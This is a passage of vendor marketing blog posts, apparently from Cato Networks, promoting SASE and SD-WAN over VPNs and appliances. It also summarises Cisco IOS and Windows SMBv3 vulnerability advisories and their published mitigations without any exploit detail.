Software-defined perimeter (SDP) also known as Zero Trust Network Access (ZTNA), is gaining traction as the new (and preferred) approach for granting secure access to the modern business. When offered as a cloud service, SDP eliminates the scalability limitations of VPN and enables immediate increase in remote access, without requiring additional hardware or software. SDP also offers enhanced security as it provides granular access control at the application level, as well as monitoring capabilities.
So, is the answer to question #2 a simple yes? Not exactly. SDP is a better option than VPN, however, SDP as a stand-alone solution doesn’t address the critical needs of continuous threat prevention and performance optimization.
Continuous threat prevention is vital as it protects the network from threats caused by remote users (whether knowingly or unknowingly). Performance optimization is essential for granting users accessing applications from anywhere, the same experience they’d get if they were physically in the office. Without these two key capabilities, replacing VPN with just SDP seems – for lack of a better word – pointless.
3. What does Gartner think?
Gartner considers SDP to be a core component of its new market category called Secure Access Service Edge (SASE). This ensures a unified, cloud-native approach, which is the main difference between a stand-alone SDP and SDP delivered as part of SASE.
According to Gartner’s Hype Cycle for Network Security, 2020, when SDP is integrated into a SASE platform, it presents a “flexible alternative to VPN” with significant benefits to the digital business including:
Advanced security: SASE’s integrated security stack inspects all traffic passing through to the network regardless of its source or destination.
Unlimited scalability: SASE’s cloud-native, distributed architecture supports any number of users, anywhere in the world.
Enhanced Performance: A true SASE platform includes a private backbone and WAN optimization, removing the need for the unreliable public Internet and guaranteeing best performance for all users and applications.
4. What’s the big difference?
The business impact of SDP built into SASE is clear and immediate. Agility, user experience, ease of adoption, granular application access, ongoing threat prevention, and simple policy management are just some of the benefits. Mostly SDP with SASE supports the digital transformation and business continuity by enabling all employees to work securely and effectively from remote.
5. Is there a happy ending?
The Motorola StarTAC was the first flip phone ever and was broadly adopted by consumers across the globe. Still, consumers managed to happily move on (several times) to newly introduced, more advanced, and more relevant phones. The same is true with access solutions. Business needs have changed, requiring full time access to enterprise assets, alongside granular security policies to protect these assets.
SDP with SASE is an agile, remote access solution that delivers instant and unlimited scalability, ease of adoption, enhanced security, and optimized performance to all users worldwide. SDP with SASE is the adaptable solution for enterprises determined to keep their business afloat during a global crisis, while ensuring support for both unexpected changes and planned growth initiatives moving forward. It’s really time to say goodbye to VPN – without regret.
Last month’s security advisories published by the Cisco Security reveals several significant vulnerabilities in Cisco IOS and IOS XE software. Overall, there were 28 high impact and 13 medium impact vulnerabilities in these advisories, with a total 46 new CVEs. All Cisco products running IOS were impacted, including IOS XR Software, NX-OS Software, and RV160...
The Newest Cisco Vulnerabilities Demonstrate All That’s Wrong with Today’s Patching Processes Last month’s security advisories published by the Cisco Security reveals several significant vulnerabilities in Cisco IOS and IOS XE software. Overall, there were 28 high impact and 13 medium impact vulnerabilities in these advisories, with a total 46 new CVEs. All Cisco products running IOS were impacted, including IOS XR Software, NX-OS Software, and RV160 VPN Router.
The sheer quantity of vulnerabilities should raise alarms but so should the severity. Based on my own analysis of two sets of advisories — Zone-based firewall feature vulnerabilities (CVE-2020-3421 and CVE-2020-3480 ) and DVMRP feature vulnerabilities (CVE-2020-3566 and CVE-2020-3569) — their impact will be very significant. Both advisories seriously leave enterprises exposed, in ways that never needed to or should have happened.
[caption id="attachment_11409" align="alignnone" width="2088"] Figure 1 - Many vulnerabilities with High impact provided by the Cisco advisory center (partial list).[/caption]
Zone-based firewall vulnerabilities expose networks to TCP attacks
The multiple vulnerabilities Cisco reported in its Zone-Based Firewall feature of IOS (CVE-2020-3421, CVE-2020-3480) leave enterprises network open to simple L4 attacks.
More specifically, Cisco advisory notes that these vulnerabilities could allow an unauthenticated, remote attacker to cause the device to reload or stop forwarding traffic through the firewall. Cisco reports that “The vulnerabilities are due to incomplete handling of Layer 4 packets through the device.” In such cases, the attacker could craft a sequence of traffic and cause a denial of service.
Organizations will need to patch affected devices as there are no workarounds. As Cisco explains in CVE-2020-342, “Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.”
However, patches themselves introduce risks. They involve OS-level changes, which in the rush to publish often contain their own bugs. Network administrators need time to test and stage the new patch. In the meantime, the devices remain open for a simple L4 attack that could potentially take down their networks.
Handling of DVMRP vulnerabilities raises serious questions.
Even worse was how Cisco handled vulnerabilities Cisco IOS XR’s Distance Vector Multicast Routing Protocol (DVMRP) (CVE-2020-3566, CVE-2020-3569). Cisco originally published this Security Advisory on Aug 28, 2020, when Cisco’s response team became aware of exploits leveraging this vulnerability in the wild. But it took a month, yes, a month, before they provided some means for enterprises to address this threat.
According to the Cisco advisory, bugs in DVMRP “could allow an unauthenticated, remote attacker to either immediately crash the Internet Group Management Protocol (IGMP) process or make it consume available memory and eventually crash. The memory consumption may negatively impact other processes that are running on the device.”
In short, an attacker could craft an IGMP traffic to degrade packet handling and other processes in the device. These vulnerabilities affect Cisco devices running any version of the IOS XR Software with multicast routing enabled on any of its interfaces. For a month, Cisco announced to the world that the door was wide open on any network running multicast.
To make matters worse, last month’s security advisory does little to lock that door. There are no patches to fix the vulnerability or even workarounds to temporarily address the problem. Instead, Cisco shared two possible mitigations, but both are limited.
One mitigation suggests rate limiting the IGMP protocol. Such an approach requires customers to first understand the normal rate of IGMP traffic, which would require network analysis of past data that if not done correctly could cause other issues, such as blocking legitimate traffic.
The second mitigation proposed adding an ACL that denies DVMRP traffic for a specific interface. But this mitigation, though, only helps those interfaces that do not use DVMRP traffic, leaving other interfaces exposed.
[caption id="attachment_11410" align="alignnone" width="2474"] Figure 2 – Cisco first published an advisory on Aug 28, leaving an open, zero-day vulnerability without a patch.[/caption]
Enough with the pain of patching appliances
In both cases, enterprise networks were left seriously compromised by vulnerabilities in the very appliances meant to connect or protect them. And this is hardly the first time (check out this post for other examples).
Appliance vendors apologize, rush to provide assistance in the form of an update, but its enterprises who really pay the burden. Security and networking teams need to stop what they’re doing, and work double-time to address vulnerabilities ultimately created by the vendors. It’s pressurized, intense race to fix problems before attackers can exploit them.
At what point will appliance vendors stop penalizing IT and start solving the problems themselves? The sad answer — never.
The problem isn’t Cisco (or any other vendor’s) security group. It’s the nature of appliance. As long as vendors cling to aging appliance architectures, enterprises will suffer the pains of patching. Vendor security teams will invariably have to choose between alerting the public and providing corrective action.
The answer? Make the vendor responsible for your security infrastructure. If they’re not going to fix the problem – and stand behind it — then why should you be the one who has to pay for it? Cloud providers maintains the infrastructure for you and so should appliance vendors. With cloud providers, there are no gaps between vulnerability notification and proactive action for attackers to exploit. If a vulnerability exists, cloud providers can patch infrastructure hood and add mitigations transparently for all users everywhere — instantly.
That’s the power of the cloud and it’s particularly relevant as we start to look at SASE platforms. The advocacy for appliance-based SASE platforms will only continue to lead enterprises down this never-ending patch pain. Moving processing to the cloud resolves that pain for good. Anything else leaves enterprises suffering unprotected in this new age of networking and security.
I grabbed a beer with a close friend of mine the other night. He’s in his 30’s, recently married, and expecting his first little one. As we chat about his new life, the matter of car buying came up. “My wife told me to go look at this SUV. I know it’s the right move...
Network Security is Not a Sports Car I grabbed a beer with a close friend of mine the other night. He’s in his 30’s, recently married, and expecting his first little one. As we chat about his new life, the matter of car buying came up. “My wife told me to go look at this SUV. I know it’s the right move and all, but there’s this hot, little Maserati...”
He didn’t need to finish. I knew what he was getting at. The Maserati, he confessed, made him feel young and free. He could go from 0 to 60 in less than 4 seconds, which we both agreed is great on paper but seldom used in city traffic. The SUV? It’s not quite as sleek and shiny but came with the latest car security features, perfect for his family’s future expansion.
“So, where’s the dilemma?” I asked him. He already answered his life-and-death question. “You’ve got to protect your family.”
“I know,” he said, “but I like having the fastest car I can afford, even if I never really drive that fast.”
Everybody Likes Sports Cars. Even IT Geeks
I wasn’t surprised. I can’t tell you how many times I’ve had similar conversations with IT professionals. The details might be different but the story is the same. A network or security appliance has reached end-of-life, and a project is kicked-off to find the latest and greatest replacement. A natural affinity for big brands with never-ending datasheets and feature lists immediately (and often subconsciously) takes hold. As we all know, “No one ever got fired for buying...” And, so, the team buys the Biggest, Baddest, Brand Appliance loaded with the newest features. Will they ever be used? Probably not. But just having them makes IT feel a bit better, like getting to 60 in less than 4 seconds.
The thing is, there is a penalty paid for that kind of speed. In my friend’s case, it’s the SUV’s security features he’ll be missing from his Maserati. In the case of IT, it’s the overhead that comes with appliances.
We’ve all seen how switching, routing, and, yes, even SD-WAN have rapidly approached commoditization as new vendors have jumped into the market. The core features, once so unique, have become commonplace. Differentiation increasing becomes about price and highly specialized features that are only applicable to a handful of companies. Increasingly, the real value of a solution is less about specific capabilities and more about the operational overhead and agility of the solution. As Gartner puts it “After decades of focusing on network performance and features, future network innovation will target operational simplicity, automation, reliability and flexible business models.”*
But regardless of the vendor, appliances as an architectures come with certain implicit limitations. There's a whole lifecycle that burdens IT with costs and complexity. Appliances need to be bought, deployed, maintained, upgraded, and retired. As patches are released, they need to be staged, tested, and deployed. It’s a complex, time-consuming operation that often necessitates disrupting network operations. And as traffic volumes grow or feature activated, the load on appliance grows, forcing upgrades outside of budgetary cycles. What's more, appliances cover only a small part of the network, requiring additional solutions for the rest of the network making overall visibility control difficult.
Appliances are good for one thing – making money. So Big Brands built on appliances have a vested interest in perpetuating those architectures. They focus on their long lists of increasingly obscure features, many of which you will never be used. But like the sex appeal of a Maserati, you only realize the mistake in buying into the Big Brand marketing when it’s too late – after the crash comes, or, in IT’s case, when the company needs to meet a key business requirement, such as mergers and acquisitions (M&A), cloud migration, and global expansion. Suddenly, the limitations of appliances become all too clear.
Take an M&A, for example. How are you going to get all of the acquired sites and your sites onto common security levels and enforced by the same policy? From a management perspective, how are you going to gain visibility into all security events?
With a NGFW appliance, your options are limited. One solution would be to align everyone to a single vendor. An enormous headache. Another solution is to keep the existing stack and buy additional products for orchestration and monitoring of the multiple security products. More expense. A third option would involve a lot of integration - manual work that no one really has the time for. Which pain would you prefer?
SUV: It’s All About Maturity, Responsibility...And Fun
The other approach is to forgo the sex appeal of the sports car, or in IT’s case, the Big Brand appliance and focus on solutions that really do meet today’s requirements for agility. Gartner terms these cloud-native services SASE (Secure Access Service Edge). They converge networking and security moving the heavy processing of edge appliances into a global, cloud-native platform where they can benefit from all of the elasticity, scalability, and affordability of the cloud.
True, cloud-native SASE services might not have the appeal of the Biggest Brands. They don’t necessarily have legions of features or claims of terabit performance.
What they do bring, however, is a global networking and security platform that empowers IT to be a business enabler and champions. By connecting and securing all enterprise edges – mobile users, remote users, branches, datacenters, cloud applications, and cloud datacenters – SASE is ready for any networking challenge the CIO might face. With all edges on one network, SASE provides the deep, enterprise-wide visibility that makes management and operations much simpler. And with SASE providers running the networking and security on global, cloud-native appliances, appliances are left to be highly scalable, easily upgradable, and always maintained by the provider.
In short, IT gains a platform, not just a product that, like the SUV, brings overall benefits to many areas. All of which makes meeting modern day requirements, simple.
Take that M&A, for example. There’s no need to deploy new appliances or even force a security change. Just have the acquired company connect their branch firewalls to the SASE cloud, and security is immediately unified, enforced, and monitored in a single place.
The same goes for other critical business challenges. Need to deploy five new pop-up stores per month? Good luck configuring, deploying and installing the necessary appliances. With SASE, you can make it 10 or even 100. Small stores can be first brought online instantly by establishing an IPsec tunnel from an existing firewall to the local SASE POP or by equipping the users with the SASE mobile client. Meanwhile, adding SASE’s self-configuring, edge SD-WAN device to the store is easy and gives the store not just SD-WAN, but security and cloud connectivity as well.
Today Is the Day of the SASE SUV
The day has arrived when someone will be fired for buying on brand alone. My friend’s wife couldn’t care a hoot how much he had a need-for-speed or that the car is named Maserati if it put her future children at risk or required them to buy yet another car to accommodate the stroller and car seat.
And the business won’t care about the logo on your router, edge SD-WAN, or NGFW appliance if you can’t be more efficient, agile, and enable the company’s success. If you can’t complete the logistics behind the M&A quickly or if you can’t enable the business to open those stores every month -- and do so with all the needed security and reliable cloud connectivity they require -- then it doesn’t matter if your HQ NGFW appliance comes from a Gartner MQ leader.
So, go enjoy that wonderful weekend with your family, take some time off from work, and don’t worry about what the new ask waiting for you from the CEO. SASE has you covered.
* Gartner, 2019 Strategic Roadmap for Networking, Jonathan Forest, Neil Rickard, 10 April 2019
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
Occasionally, prospective customers ask whether Cato offers sandboxing. It’s a good question, one that we’ve considered very carefully. As we looked at sandboxing, though, we felt that the technology wasn’t in line with the needs of today’s leaner, more agile enterprises. Instead, we took a different approach to prevent zero-day threats or unknown files containing...
Sandboxing is Limited. Here’s Why and How to Best Stop Zero-Day Threats Occasionally, prospective customers ask whether Cato offers sandboxing. It’s a good question, one that we’ve considered very carefully. As we looked at sandboxing, though, we felt that the technology wasn’t in line with the needs of today’s leaner, more agile enterprises. Instead, we took a different approach to prevent zero-day threats or unknown files containing threats.
What is Sandboxing?
Legacy anti-malware solutions rely mostly on signatures and known indicators of attack to detect threats, so they’re not always adept at catching zero-day or stealth attacks. Sandboxing was intended as a tool for detecting hidden threats in malicious code, file attachments and Web links after all those other mainstream methods had failed.
The idea is simple enough -- unknown files are collected and executed in the sandbox, a fully isolated simulation of the target host environment. The file actions are analyzed to detect malicious actions such as attempted communication with an external command and control (C&C) server, process injection, permission escalation, registry alteration or anything else that could harm the actual production hosts. As the file executes, the sandbox runs multiple code evaluation processes and then sends the admin a report describing and rating the likelihood of a threat.
Sandboxing Takes Time and Expertise
As with all security tools, however, sandboxing has its drawbacks. In this case, those drawbacks limit its efficiency and effectiveness particularly as a threat prevention solution. For one, the file analysis involved in sandboxing can take as much as five minutes--far too long for a business user to operate in real-time.
On the IT side, evaluating long, detailed sandboxing reports takes time, expertise, and resources. Security analysts need to have a good grasp of malware analysis and operating system details to understand the code’s behavior within the operating environment. They must also differentiate between legitimate and non-legitimate system calls to identify malicious behavior. Those are highly specialized skills that are missing in many enterprises.
As such, sandboxing is often more effective for detection and forensics than prevention. Sandboxes can be a great tool for analyzing malware after detection in order to devise a response and eradication strategy or prevent future attack. In fact, Cato’s security team uses sandboxes for that very purpose. But to prevent attacks, sandboxes take too long and impose too much complexity.
Sandboxes Don’t Always Work
The other problem with sandboxes is that they don’t always work. As the security industry develops new tools and strategies for detecting and preventing attacks, hackers come up with sophisticated ways to evade them and sandboxes are no exception. Sandbox evasion tactics include delaying malicious code execution; masking file type; and analyzing hardware, installed applications, patterns of mouse clicks and open and saved files to detect a sandbox environment. Malicious code will only execute once malware determines it is in a real user environment.
Sandboxes have also not been as effective against phishing as one might think. For example, a phishing e-mail may contain a simple PDF file that exhibits no malicious behavior when activated but contains a user link to a malicious sign-in form. Only when the user clicks the link will the attack be activated. Unfortunately, social engineering is one of the most popular strategies hackers use to gain network entry.
The result: Sandboxing solutions have had to devise more sophisticated environments and techniques for detecting and preventing evasion methods, requiring ever more power, hardware, resources and expense that yield a questionable cost/benefit ratio for many organizations
The Cato Approach
The question then isn’t so much whether a solution offers sandboxing but whether a security platform can consistently prevent unknown attacks and zero-day threats in real-time. Cato developed an approach that meets those objectives without the complexity of sandboxing.
Known threats are detected by our anti-malware solution. It leverages full traffic visibility even into encrypted traffic to extract and analyze files at line rate. Cato determines the true file type not based on the file extension (.pdf, .jpeg etc.) but based on file contents. We do this to combat evasion tactics for executables masking as documents. The file is then validated against known malware signature databases maintained and updated by Cato.
The next layer, our advanced anti-malware solution, defends against unknown threats and zero-day attacks by leveraging SentinelOne’s machine-learning engine, which detects malicious files based on their structural attributes. Cato’s advanced anti-malware is particularly useful against polymorphic malware that are designed to evade signature-based inspection engines.
And Cato’s advanced anti-malware solution is fast. Instead of 1-5 minutes to analyze files, the advanced machine learning and AI tools from SentinelOne allow Cato to analyze, detect and block the most sophisticated zero-day and stealth attacks in as little as 50 to 100ms. This enables Cato advanced anti-malware to operate in real-time in prevention mode.
At the same time, Cato does not neglect detection and response. Endpoints can still become infected by other means. Cato identifies these threats by detecting patterns in the traffic flows across Cato’s private backbone. Every day, Cato captures the attributes of billions of network flows traversing Cato’s global private backbone in our cloud-scale, big data environment. This massive data warehouse provides rich context for analysis for Cato’s AI and anomaly detection algorithms to spot potentially harmful behaviors symptomatic of malware. Suspicious flows are reviewed, investigated and validated by Cato researchers to determine the presence of live threats on customer networks. A clear report is provided (and alerts generated) with Cato researchers available to assist in remediation.
Check out articles in Dark Reading here and here to see how Cato’s network threat hunting capability was able to detect previously unidentified malicious bot activity. Check out this Cato blog for more information on MDR and Cato’s AI capabilities.
Protection Without Disruption
Organizations need to prevent and detect zero-day threats and attacks in unknown files, but we feel that sandboxing’s speed and complexity are incompatible with today’s leaner, nimbler digital enterprises. Instead, we’ve developed a real-time approach that doesn’t require sophisticated expertise and is always current. But don’t take our word for it, ask for a demo of our security platform and see for yourself.
Modern enterprises are going through challenging times. Increasing price competition, customer expectations for a seamless buying experience, instant delivery – altogether require a business that operates at optimal reliability and efficiency. At the same time, the business must be very agile to quickly adapt to market dynamics. Those business requirements are dependent on having a...
SASE and WAN Transformation – A Strategic Duo Modern enterprises are going through challenging times. Increasing price competition, customer expectations for a seamless buying experience, instant delivery – altogether require a business that operates at optimal reliability and efficiency. At the same time, the business must be very agile to quickly adapt to market dynamics. Those business requirements are dependent on having a network and IT infrastructure that is just as agile and dynamic as the business itself.
Businesses must keep their momentum and expect IT to enable their progress. Whether it’s a merger with or acquisition of a competitor, a global expansion, or even the need to quickly open new offices, sites or stores – IT is expected to support it all in significantly shorter delivery times than ever before.
The past, the present, and the alternative future
IT teams have a long tradition of solving point problems with point solutions. A modus operandi fit for old days when there just wasn’t any good and unified alternative. Take global expansion as an example: The business is expanding to Europe. IT now need to connect the new European branches to the company’s applications in the US with guaranteed performance and availability, and without compromising on security. This would translate into multiple projects: negotiate MPLS contracts for global connectivity, deploy WAN optimization to improve the overseas application performance, connect offices with local Internet breakout, and secure each office with UTMs or SWGs.
There is an alternative approach to such scenarios, and it is called a Secure Access Service Edge, or ‘SASE’ in short. A SASE platform converges all the network and network security capabilities, typically deployed as point products, into a unified and globally distributed cloud service. SASE eliminates the need to search, evaluate, procure, integrate and maintain multiple point products needed to keep the business going.
SASE not only addresses the current challenges IT teams face with the exhausting management of multiple point product, but it also addresses the uncertainties of the future. Provided as a cloud-native service, a SASE platform can adapt to new networking and security requirements, future-proofing the IT infrastructure that is supporting the digital business.
The future looks brighter with SASE
Let’s revisit the global expansion example from the perspective of an IT team that is already using a SASE platform. The need to connect the new European offices to the applications located in the US reliably is addressed by the SASE’s global private backbone which provides an MPLS alternative. The SASE’s built-in WAN optimization capabilities ensure application performance is not degraded by long distance latency and limited bandwidth of oversees MPLS connections. Security is already in place and is enforced as soon as the new European sites are online and connected to the SASE cloud. What this means for IT is that all they need to do to support such a business expansion to Europe is to subscribe to a local Internet service -- that’s it.
So let’s compare the old way with the new. In a pre-SASE world, a global expansion project will require the procurement of multiple services (MPLS, local internet) and multiple products (WAN optimization, security, etc.), wherein a SASE world, the only requirements are just one or two Internet circuits for each office. Being an all-in-one platform, SASE also eliminates the repetitive evaluation, procurement, and integration cycles of point products significantly reducing overall project times.
SASE gets you ready for whatever’s next
IT primary responsibility is enabling the business to pursue new opportunities. M&A, cloud migration, global expansion, mobility, or the rapid deployment of new locations all play out in almost every organization.
Traditionally with each project, you would have to choose the solutions to build the infrastructure to support it. It can be Edge SD-WAN to overcome your MPLS limitations, a private global backbone to connect your remote branches, NGFWs , UTMs and SWGs to secure branches with direct internet access, and access and optimization solutions for your clouds and mobile workforce.
Looking at the following table shows that if you choose a SASE platform – all of those IT infrastructure projects will simply go away:
IT teams that lead and execute WAN transformation need to carefully choose the architecture they select to support both current and future needs of the business they serve. The power of a SASE platform as a future-proofing architecture is clear, as it is it only way IT teams can support the efficiency and agility requirements of modern and competitive businesses with an equally efficient and agile IT infrastructure.
At the beginning of the month, Microsoft released an advisory and security patch for a serious Windows Server Message Block (SMB) vulnerability called the Windows SMBv3 Client/Server Remote Code Execution Vulnerability (AKA Windows SMBv3 RCE or CVE-2020-0796). The Server Message Block (SMB) protocol is essential for Windows network file and print sharing. Left unpatched, this...
Protect Your Systems Now from the Critical Windows SMBv3 RCE Vulnerability At the beginning of the month, Microsoft released an advisory and security patch for a serious Windows Server Message Block (SMB) vulnerability called the Windows SMBv3 Client/Server Remote Code Execution Vulnerability (AKA Windows SMBv3 RCE or CVE-2020-0796). The Server Message Block (SMB) protocol is essential for Windows network file and print sharing. Left unpatched, this new SMB vulnerability has the potential to create a path for dangerous malware infection, which is why Microsoft has labeled it Critical.
Windows SMBv3 RCE isn’t the first vulnerability in SMB. In May 2017, the infamous Wannacry ransomware attack disabled more than 200,000 Windows systems in 150 countries using a similar (but not the same) SMB vulnerability. One of the hardest hit victims, the British National Health Service (NHS), had to cancel more than 19,000 appointments and delay numerous surgeries. Microsoft had already issued a security patch but Wannacry was able to infect thousands of unpatched systems anyway.
Cato urges every organization to apply the Microsoft patch (CVE-2020-0796) now across all relevant Windows systems, which we’ll discuss here. Cato also updated its IPS to block any exploit using this new vulnerability. As long as customers have their Cato IPS to Block mode, their systems will be protected. There’s no need to run IPS updates as you would with a security appliance or on-premises software. Thanks to Cato’s cloud-native architecture, the update is already deployed for all Cato customers.
How CVE-2020-0796 Works
Unlike Wannacry that exploited vulnerabilities in older versions of Windows, this new vulnerability lies in the latest version of Windows 10. Specifically, vulnerability is found in the decompression routines of SMB version 3.1.1 (SMBv3) found in Windows 10, version 1903 and onwards for both 32- and 64-bit systems, the and recent versions of Windows Server Core used in applications such as Microsoft Datacenter Server.
An attacker could exploit this vulnerability to execute malicious code on both the SMB server and client side. They could attack Windows SMB server directly or induce an SMB client user to connect to an infected SMB server and infect the client.
An attack using this vulnerability could happen in a few ways. A hacker could attack systems from outside the enterprise network directly if a system’s SMB port has been left open to the Internet. By default, Windows Firewall blocks external connections to the SMB port, however. A more common scenario would involve a user inadvertently installing malware on their system by clicking on a malicious link in a spam email. The malware would then exploit the new SMBv3 vulnerability to spread across other Windows systems on the network.
How to Protect Yourself
The best way to protect your organization from malware exploiting this critical vulnerability is to make sure all Windows 10 systems and any remote, contractor or other systems accessing the enterprise network have applied the Microsoft security patch. If you need to delay patching for any reason or can’t be sure every system is patched, there are other measures IT can take.
The easiest is to simply disable SMBv3 compression on all systems via registry key changes, which wouldn’t have any negative impact as SMBv3 compression isn’t used yet. Microsoft describes how to do this in its advisory (see figure 1 below) and it could be accomplished over hundreds of systems via Group Policy. This would solve the problem for SMB servers but not SMB clients.
[caption id="attachment_10132" align="aligncenter" width="2766"] Figure 1: Microsoft Instructions for Disabling SMBv3 Compression[/caption]
You could also block inbound TCP Port 445 traffic, but that port may be used for other Windows components and would only protect you from attacks from the outside, not attacks spreading internally.
As for internal network flows, it’s always prudent to segment your network to restrict unnecessary traffic in order to prevent attacks like these from spreading laterally. There is no reason, for example, that a client system from your finance department should have network access to systems in human resources via the Windows SMB protocol.
How Cato Protects You
There are two ways Cato protects its customers. Thanks to its cloud-native architecture, Cato continually maintains and updates its extensive security stack across every Cato PoP, protecting all communications across the Cato network, whether a branch office or mobile user connects over the Cato backbone to the datacenter or with another branch office or mobile user. Cato’s cloud-native architecture applied all security updates, including the IPS signature for this newly announced vulnerability, shortly after Microsoft released its advisory. Enterprise IT doesn’t have to do anything, such as updating a security appliance. All exploits that take advantage of this vulnerability are already blocked as long as your IT department has set the Cato IPS for Block mode on all traffic scopes (WAN, Inbound and Outbound).
[caption id="attachment_10134" align="aligncenter" width="1090"] Figure 2: Apply Block Settings to All Traffic Scopes[/caption]
Even without this IPS update, however, Cato’s security stack uses other means to detect and alert on any traffic anomalies that could indicate an attack, even a zero-day attack. For example, if a host normally communicates using SMB with one or two other hosts and then suddenly communicates with hundreds of hosts, Cato’s IPS will detect those anomalous flows. It can alert IT or even cut off the flows depending on configuration. This may not block an attack completely, but it will allow IT to limit the damage and apply necessary measures to prevent the attack in the future.
We’ll continue to keep you abreast of any critical Windows vulnerabilities in the future. Cato customers can rest assured that Cato will take all possible measures to protect their networks against new vulnerabilities, immediately.
Unified Communications-as-a-Service (UCaaS) is increasingly attractive to organizations looking to eliminate the cost of operating on-premises platforms and PSTN access contracts. However, those looking to adopt UCaaS to save money may be in for a nasty surprise. UCaaS offerings move unified communications capabilities — integrated calling, conferencing, and messaging applications — normally delivered from on-premises...
Reducing WAN Spend when Adopting UCaaS Unified Communications-as-a-Service (UCaaS) is increasingly attractive to organizations looking to eliminate the cost of operating on-premises platforms and PSTN access contracts. However, those looking to adopt UCaaS to save money may be in for a nasty surprise.
UCaaS offerings move unified communications capabilities — integrated calling, conferencing, and messaging applications — normally delivered from on-premises servers, into the cloud. The idea, like so many cloud services, is that UCaaS will lower the adoption barrier by eliminating capital expenses to procure new applications, while also reducing UC implementation and operational costs - and to an extent that’s true.
Our research also shows, though, that many enterprises experience an increase in WAN costs to support connectivity to the cloud. Approximately 38% of companies benchmarked by Nemertes Research in 2018 saw their WAN costs rise as a result of their adoption of UCaaS, with a mean increase in spend of 23.5%. More than a third cited rising network costs as the biggest contributor to increasing their UC open spend in their first year of moving to the cloud.
What’s driving these network cost increases? Two factors in particular:
The need to increase bandwidth between the organization and the Internet to support connectivity to the UCaaS provider
The need to add bandwidth between locations to support new features commonly available from UCaaS providers, like video conferencing.
Those seeing rising network costs typically purchase additional MPLS bandwidth from their existing WAN supplier(s). They have not yet begun to deploy SD-WAN to add bandwidth, support real-time applications, and reduce WAN spend.
SD-WAN reduces WAN expense by virtualizing network access services, allowing organizations to replace or reduce expensive MPLS access links with lower cost Internet services while maintaining necessary performance and reliability to support voice and video communications. Emerging SD-WAN service providers further build upon the benefits of SD-WAN by offering guaranteed end-to-end performance across the globe, as well as direct network connectivity to many UCaaS providers, enabling efficient call flows.
Additional cost reductions result from collapsing the branch stack, replacing dedicated firewalls, WAN optimizers, session border controllers, and routers with converged functions that run features as virtual instances on a virtual customer-premises equipment (vCPE) or are provided by the SD-WAN. Nemertes also finds that network management costs decline on average by 20% for those organizations who have converted at least 90% of their WAN to SD-WAN.
An example of real-world potential savings is shown below. In this scenario, a 200-site organization using MPLS spends $3.476 million per year on network costs. Shifting to 100% SD-WAN reduces those costs to $2.154 million, a net savings of $1.321 million per year.
SD-WAN adoption results in further demonstrable benefits, including improved resiliency by adding secondary network connections to branch offices, faster turn-up of new branch offices, and the ability to more rapidly increasing branch office bandwidth.
Those considering, or adopting UCaaS would be wise to evaluate the impact that UCaaS adoption will have on their network, particularly with regard to demands for additional bandwidth to support video conferencing, and the need for high resiliency, low latency, and low jitter network performance. Evaluate SD-WAN as a means of meeting the performance and reliability needs of UCaaS while reducing WAN spend.
One of the key requirements of Unified Communications-as-a-Service (UCaaS) is the ability to connect to service providers via the Internet. As I discussed in my previous blog, few companies, especially global organizations, have Internet access at every branch. UCaaS traffic must be backhauled across the WAN to Internet access point resulting in inefficient traffic routing...
Optimizing UCaaS Access with SD-WAN Services One of the key requirements of Unified Communications-as-a-Service (UCaaS) is the ability to connect to service providers via the Internet. As I discussed in my previous blog, few companies, especially global organizations, have Internet access at every branch. UCaaS traffic must be backhauled across the WAN to Internet access point resulting in inefficient traffic routing for voice and video calls, and potential quality issues related to excessive delay and jitter.
To remedy this situation, network architects have two primary options: “Meet Me” direct connect services that establish a dedicated link (or links) between the enterprise’s network, and the UCaaS provider’s network, or SD-WAN.
Direct connect options extend the enterprise WAN so that the UCaaS provider appears as just another node on the network. Once the direct connection is established, typically via Ethernet or MPLS, all sites are able to reach the UCaaS provider’s datacenter without having to traverse enterprise Internet connection points. An architectural example is shown below.
[caption id="attachment_6082" align="aligncenter" width="939"] Figure 1: Direct Connect to UCaaS Provider[/caption]
Approximately 16% of the more than 300 end-user organizations participating in Nemertes recent “WAN Economics 2018-19” research study currently use these types of services to connect to their cloud provider.
UCaaS providers typically offer direct connect services to their data centers for an additional fee (on top of the cost of the circuit or circuits). Examples include AWS Direct Connect (for AWS Chime), Cisco Webex Edge (for Cisco Webex), Google Cloud Interconnect (for G Suite), Microsoft ExpressRoute (for Office 365), and RingCentral CloudConnect (for RingCentral Office). Another downside to this approach is that not all UCaaS providers support this connectivity model.
Another option is the use of WAN-Cloud exchanges. Like the direct connect model, a WAN-Cloud exchange allows an organization to directly connect its existing data network to a UCaaS provider, but only if both have a presence in a co-location facility. A WAN-Cloud exchange may allow an enterprise to easily connect to multiple cloud providers who have a presence within a co-location facility. An architectural model for this approach is shown below:
[caption id="attachment_6083" align="aligncenter" width="939"] Figure 2: WAN-Cloud Exchange Access to UCaaS Provider[/caption]
Here, the customer purchases an interconnect service provided and managed by the co-location provider (e.g. Equinix, Megaport, etc.), and like the earlier direct connect example, the customer must pay an additional fee for this service, and their UCaaS provider must support this connectivity option. Approximately 13% of organizations use carrier exchange services today to connect to their provider(s).
In both of these direct connect models the customer is responsible for ensuring security of the connection between their network, and the UCaaS provider’s network, potentially creating additional cost by adding the need for firewalls and/or application layer gateways at connection points. And, customers must establish separate direct connect services for all of their cloud providers.
The second approach entails leveraging SD-WAN services as the means of connectivity to the UCaaS provider. Unlike simply extending your existing data network to your UCaaS provider, SD-WAN services offer the option to reduce WAN spend by off-loading UCaaS (and other SaaS) traffic onto lower-cost Internet connection links, improve resiliency, and guarantee performance for latency sensitive traffic like VOIP. SD-WAN virtualizes available access circuits, routing traffic over the ideal path for a given application type. Some SD-WAN service providers offer direct connect connectivity from their own networks to UCaaS providers.
In the case of UCaaS, SD-WAN will pick paths that meet UCaaS requirements for delay and jitter. Some SD-WAN services will provide detailed voice and video quality performance information, and provide managed security between your network and the UCaaS provider, preventing against potential SIP attacks including data exfiltration and denial of service. Twenty-three percent of our research participants are using SD-WAN today, reporting on average 20% reduction in WAN management resource requirements, 33% reduction in troubleshooting time, fewer site outages, and faster recovery time.
An architectural model for in-net SD-WAN is shown below:
[caption id="attachment_6084" align="aligncenter" width="887"] Figure 3: SD-WAN Architectural Model[/caption]
